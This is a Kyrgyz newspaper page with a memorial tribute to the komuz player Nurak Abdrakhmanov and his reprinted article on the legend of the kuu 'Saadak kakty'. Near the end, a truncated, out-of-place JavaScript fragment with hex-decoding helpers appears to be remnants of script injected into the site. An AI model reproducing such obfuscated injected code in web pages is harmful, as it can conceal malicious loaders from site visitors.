Залкар күүчү, кайталангыс комузчу Нурак  агабыздан айрылганыбызга  26-май күнү эки жыл болот. Ал кечээ эле комузун колунан түшүрбөй арабызда жүргөн…

1-Нурак аба

Залкарды эскерүү

Жаны тынбаган эмгекчил мүнөзү менен күү аткаруунун, ыр ырдоодонун үстүндө  талыкпай изденип жашаган агабыз тамак ичүүнү унутушу мүмкүн эле, бирок комуздун кылдарын кылдыратып күү издегенди саамга да унутчу эмес. Күүлөрүн чыгаруу, обондорун жаратуу  менен гана чектелип калбай, күүлөрдүн уламыш тарыхын чечмелеп жазып, кыргыздын санжырасын кагазга түшүрүүдө да алтындай убакытын коротуп, андан сырткары комуз чаап, уста болуп, чыгармачылыктын албуут дайрасында күн-түн дебей сүңгүп жүрчү. Дүйнөлүк деңгээлдеги канча күүлөрдү жаратса да, аларды жогорку чеберчиликте аткарса да, “дагы эле марага жетпей жатам” деп токтоно албай, өзүнө катуу талап кое билген инсан эмес беле. Нурак Абдрахманов талбаган изденүүсүнүн, толгонуусунун аркасы менен комуздун ичеги кылын жибек жипке алмаштырганды таап берип, азыркы комузчуларды ичегиге окшош коңур үндүү кылга ээ кылып кетти.

Ооба, убагында билбедик, барктай албадык, кадырына жетпедик. Нурак агабыздын “Ата мурасы”, “Улуу тоолор”, “Найман эне”, “Соң көл” жана “Атиллахан” сыяктуу көптөгөн керемет кайруу күүлөрүн, мукам обондорун уккандар, “бул комузчу көзү өтөөрүндө ушундай жакшы ыр-күүлөрдү жаратып кетиптир” деп адашып айтып жүрүшөт.

Ал эми чындыгында, ал ушул тоо суусундай тунук чыгармаларын мындан 30 жылдай мурда эле жараткан болчу.

Залкар агабыздын күүлөрү жана өзү сөзүн дагы, обонун дагы чыгарган чыгармалары мындан ары да кылым кезип, түптүү кыргызга түбөлүк кызмат кылаарын ойлоп, ошого каниет кылабыз. Ар дайым жайдары жүргөнү, улуу-кичүүгө сылык, кичипейил бирдей мамилеси бизге өрнөк болсун. Комуз күүлөрүнүн шыңгырынан элеси жаралып, өчпөй, жанып жүрө берсин.

Кенжебек АЛДАЯР, комузчу, күүчү

 

Күү сыры

7-тема жакка Күү сыры

Арзыганын атып алган кыздын арман күүсү – “Саадак какты”  

Комузчу Атай Огонбаевдин аткаруусунда Кыргыз радиосунун алтын корунда турган «Саадак какты» күүсү өтө өзгөчөлүгү жана маңыздуулугу менен уккандын жан дүйнөсүн арбап алат. Ал күүнүн уламыш тарыхын Атайдын көп жылдар бою бирге иштеген досу, комузчу Асылбек Эшманбетовдун айтуусунда уулу Мелс жана Жекшенкул, Иса деген инилери сактап калган. 

Атай жаш бала кезинде айылдаш агасы Абдырахмандан «Ак Зыйнат» баштаган обон-күүлөрдү үйрөнүп жүрөт. Абдырахман капыс ооруп кайтыш болгондон кийин апасын кыйнап, ээрчип алып Суусамырдагы тайатасы Жантакбайдыкына келишет. Жантакбай комузчу: «Бирөөнүн ырахаты үчүн кызмат кылган, жашоо-жагдайыңа пайдасы жок бул өнөрчүлүктү үйрөнбө» деп каршы чыгат.

Себеби, Жантакбай жигит кезинде Таласта Ташкара бий деген бай адамдын тойунда болуп, тойдо комуз чертип жаткан Жантакбайды бий көрүп, анан той тараганда үйүнө ээрчитип барган экен. Аш-тамагын жайнатып коюп, төргө төшөктү калыңдата салдырып алып, комузун ала барган Жантакбайдын күү чертүүсүн өтүнөт. Эки күн бою күү нөшөрүн жамгырдай төгүп жаткан комузчу канчалык чертсе да байдын кулагы күүгө тойбойт. «Айланайын иним. Күүңдү токтото көрбө. Сенин күүң токтосо, менин жүрөгүм кошо токтойт» деп сурана берет.

Акыры күү нөшөрү токтоп калат. Бий башын көтөрүп, «Эмне токтодуң» деп караса, комуздун капкагын кан жууп кеткен экен. «Ээ иним, тырмагың жоюлган турбайбы. Эс алагой» деп уруксат берген экен анан гана. Ошондо Жантакбай эшикке чыгып, байкатпай атын токуп минип алып, качкан бойдон өз үйүнө келет. Келери менен үйүн чечтирип  жүктөп алып, түнү менен Суусамырга көчүп кетет. Үй-бүлөсү «Эмне үчүн көчтүк?» десе, «Ташкара бий дагы комуз черттирет» деп жооп берген имиш.

Ошондон кийин адамдардын көзүнчө комуз чертпеске ант кылат да, Суусамырда кетментөбөлүк Керимбай байдын (обончу Асангалый Керимбаевдин чоң атасы) коюн кайтарып тирлик кылат. Борошо болуп, катуу шамалга аралаш мөндүр-кар жаап, түнкүсүн бөлөк малчылардын малы короосунан чыгып, буюгуп, карышкырга жем болуп, жоголуп жатса, Жантакбайдын койлору короодон козголбойт. Себеби, короонун четине алачык тигип алып, Жантакбай таң аткычакты комуз чертчү экен. Койлору канчалык бороон болсо да күү кереметине арбалып, ордунан козголбой күү тыңшачу экен.

Бир жолу Жантакбайдын жалгыз уюн уурдаганы уурулар келет. Уйду жетелеп жөнөгөнү жатканда комуздун күүсү жаңыра баштайт. Күү кереметине арбалган уурулар ана кетебиз, мына кетебиз деп жатып таң атып кетет. Күүгө ыраазы болгон уурулар уйду кайра ордуна байлап, Жантакбайга салам айтып киришет. Өзүлөрүнүн кандай максат менен келгендигин ачык айтып, Жантакбайга алкыштарын жаадырып, анан кетишкен экен.

…Ошентип, атайын комуз үйрөнгөнү келген Атай “бул өнөрдү үйрөнбө” деген сөздү угуп алып, тайатасына таарынып ыйлай баштайт. Айласы кеткенде Жантакбай комуз үйрөтүүгө макул болот. Ошондогу үйрөткөн күүлөрдүн бири «Саадак какты» экен. Албетте комузчулар ал заманда ар бир күүнүн тарых-таржымалын айтып, анан чертчү тура. “Саадак кактынын” тарыхын Атайга мындайча түшүндүргөн экен.

Илгери бир заманда, үйүндө комуз чертип, мергенчиликте жаа тарткан, көзгө атар мерген кыз атасын жана айылдаштарын ээрчип алыскы тоолордон аң уулап барат. Ал тоодо бөлөк уруунун мергенчилери да жүргөн экен. Ал мергенчилердин арасында бир жигит кызга ашык болуп калат. Кийин жайчылыкта кыздын айылына каттай баштайт. Кыздын дагы купулуна жигит толгон үчүн экөө үйлөнүүгө убада кылышат. Ошентип, жашчылыктын ыйык сезимдери алоолой баштаганда жигит кызга жуучу жиберүү максатында үйүнө кайтат.

Бир аз күндөн кийин кыздын айылына түн ичинде жоо каптап келет. Каптап келген жоого каршы туруш үчүн айылдын эр бүлөсүнүн бардыгы дайыма камдалуу турган жарак-жабдыгын алып аттанып чыгышат. Албетте атасын ээрчип, алиги көзгө атар мерген кыз дагы эл менен кошо чыгат. Ошентип кызыл кыргын-кара сүргүн башталат. Караңгыда кимдин ким экени таанылбайт.

Бир мезгилде кыз өзүн көздөй чаап келе жаткан караанга жаа тартат. Ал караан жакын келип, атынан ооп жыгылганда араңжан үнү менен кыздын атын атайт. Кыз чочуп кетип, жанына келип, атынан секирип түшүп караса, өзүнүн сүйгөн жигити өлүп бара жаткан болот. Ошондо кайгыга баткан кыз каражолтой саадагын каккылап ыйлаган экен.

Көрсө, жигиттин уруусу менен кыздын уруусунун ортосунда катуу араздашуу болуп, жигиттин айылдаштары берки айылды чаап алууга келген экен. Айылдаштарынын арасында кошо келген жигит сүйгөн кызын издеп жүрүп, караңгы болсо да кыздын караанын алыстан байкап, сүйгөнүнө чаап келе жатканда жүрөгүнө сүйгөнүнүн жебеси кадалат.

Келген жоонун мизи кайтарылып, кыздын айылы аман калат. Күйүтүнө чыдабаган кыз комузуна ушул күүнү өмүр бою армандап чертип, «Саадак какты» деп атаптыр.

Ошентип Жантакбай бул күүнү икаясы менен кошо Атайга үйрөткөн  экен. Аны Атайдын досу Асылбек Эшманбетовдун айылдаш инилери, Байтик айылынын комузчулары Кусаев Жекшенкул менен Курманалиев Иса дагы сайратып чертишчү эле. Мен бул күүнүн икаясын ошолордон уккам.

Күүдө чыны менен кыздын жаа саадагын каккылаганы сыяктуу комуздун капкагын каккылаган, союл-чокмор шилтеген жигиттердин кыймылы камтылган ыкмалар байкалат. Асылбек Эшманбетовдун чертүүсүндөгү «Айкүмүштүн так илет» деген күүнү дагы ыры менен кошо Айкүмүш аттуу аял чыгарганы айтылат. Ал күү менен кошо ырдалган ырын атактуу төкмө акын Эстебес Турсуналиев күүсүн сайрата чертип келип минтип ырдаар эле:

Айылдын ити кабаган,
Абайла үзүп албасын.
Апакем чатак киши эле,
Алеңгирди салбасын.

Айкүмүштүн так илет.

Айкүмүштүн так илет.

Так илетти ким билет?

Ай караңгы түн билет.

Чыны менен бул ырды аял киши чыгарганы жогорку ырда таасын байкалып турат. Демек, “Саадак кактыны” деле кыз киши чыгарганына ишенсе болот. Бир гана күмөндүү жагдай, «Атай кичине бала кезинде үйрөнгөн үчүн Жантакбай жөнөкөйлөтүп үйрөтүп койсо керек» деген ой келет. Себеби, бороон-чапкында короосу менен койду токтотуп, атайын келген ууруларды таң атканча арбап алууга кудурети жеткен Жантакбайдын черткен күүлөрү өтө жогорку деңгээлде сайрап турса керек.

Бүгүнкү күнү күү чыгарып жаткан Кемелгазиева Шарипа, Эсенгулова Анара, Орозалиева Нурзат сыяктуу кыздарыбызга караганда аял затынын күү чыгаруу салты али уланып жатат. Ылайым алардын катары дагы орошон талант кыздарыбыз менен толукталып, “Саадак какты” сыяктуу кылымдап жашап кала турган күүлөрдүн чыгышын Жаратканым насип кылсын.

Нурак АБДРАХМАН уулу

РЕДАКЦИЯДАН: Атай Огонбаев жана анын таятасы тууралуу маалыматты, күүнүн уламыш баянын камтыган бул макаланы Нурак агабыз башка жазмалары менен бирге “Көк асабага” көзү тирүүсүндө берген эле. Макала гезитибиздин архивинен алынып жарыяланды. 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *